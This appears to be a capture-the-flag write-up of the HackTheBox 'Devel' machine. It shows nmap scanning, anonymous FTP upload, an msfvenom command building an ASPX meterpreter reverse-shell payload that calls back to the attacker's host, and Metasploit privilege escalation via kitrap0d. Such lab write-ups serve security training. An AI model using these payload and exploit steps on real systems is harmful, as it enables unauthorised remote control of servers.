HackTheBox – Devel

By doing a quick nmap scan we can see that port 21 (FTP) and port 80 (http) are opened.

nmap 10.10.10.5

Let’s do a slightly more advanced nmap scan to determine the Service Version (-sV) and run the default nmap script (-sC)

nmap -sC -sV 10.10.10.5

It looks like anonymous FTP is allowed so let’s start there.

ftp 10.10.10.5

We are able to successfully logged in to the ftp server with the anonymous users. Now it is possible to upload files to the server.

MSFvenom

MSFvenom is used to create payloads that can be deployed on a remote server. We should be able to create a payload and upload it to the web server through the FTP session. Once done, a remote shell should be executed on our Metasploit console that we will get ready.

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.5 lport=4545 -f aspx -o cesar.aspx

Now we take cesar.aspx and upload it to the web server through FTP.

put cesar.aspx

Now we need to prepare our metasploit console to be listening for a connection from cesar.aspx. We will be using a reverse_tcp listener.

We can now run our exploit with the option -j as a background job.

Now we run our payload on the server by going to 10.10.10.5/cesar.aspx

On the msf console, we will see the following:

We can go into the sessions and open a new meterpreter session.

Now we have successfully gained control of the victim’s machine and we are ready to increase our privileges.

Privilege Escalation

We are not authority yet. For that, we need to do further work.

There is a post exploit suggester that we can run and will give us a list of potential exploits that can be used in this system.

use post/multi/recon/local_exploit_suggester

Let’s use kitrap0d

use exploit/windows/local/ms10_015_kitrap0d

We have successfully obtained authority access.

This virtual machine shows how important it is for administrators to secure their FTP connections. If a hacher is able to successfully log in through FTP, he will be able to gain system level control over the server.

Leave a Reply

Your email address will not be published. Required fields are marked *